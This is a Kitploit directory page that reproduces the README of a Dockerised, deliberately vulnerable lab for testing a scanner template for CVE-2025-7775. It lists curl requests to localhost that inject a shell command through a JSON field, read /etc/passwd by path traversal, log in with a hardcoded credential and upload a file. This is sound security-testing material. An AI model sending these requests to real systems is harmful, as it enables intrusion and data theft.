Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-7775-vulnerable-lab — # Aplicação web vulnerável em Docker expondo RCE, path traversal, credenciais hardcoded e uploads de arquivos inseguros; um laboratório isolado para testar templates de scanners de segurança. | Kitploit
Ferramentas/GitHubGitHub/aaqilyousuf/cve-2025-7775-vulnerable-lab
Scanners de VulnerabilidadesExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubaaqilyousuf/cve-2025-7775-vulnerable-lab

CVE-2025-7775-vulnerable-lab

# Aplicação web vulnerável em Docker expondo RCE, path traversal, credenciais hardcoded e uploads de arquivos inseguros; um laboratório isolado para testar templates de scanners de segurança.

Ver Repositório
13há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Laboratório Vulnerável CVE-2025-7775

Este repositório fornece um ambiente vulnerável para testar o template nuclei para CVE-2025-7775.

Executar

docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app

Testes de Vulnerabilidade

1. Execução Remota de Comandos (RCE)

curl -X POST http://localhost:5000/api/v1/configuration \
  -H "Content-Type: application/json" \
  -d '{"payload":"ls > /tmp/poc_rce.txt"}'

docker exec -it vuln-test cat /tmp/poc_rce.txt

2. Path Traversal

curl "http://localhost:5000/download?file=/etc/passwd"

3. Credencial Hardcoded

curl -X POST http://localhost:5000/api/v1/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin", "password":"citrix123"}'

4. Upload Inseguro de Arquivos

echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt

Notas de Uso

  • Este é um ambiente vulnerável simulado apenas para fins de teste
  • Use apenas em ambientes de laboratório isolados
  • Não destinado ao uso em produção
  • Apenas para fins educacionais e de pesquisa em segurança

Limpeza

docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app
Baixar ferramenta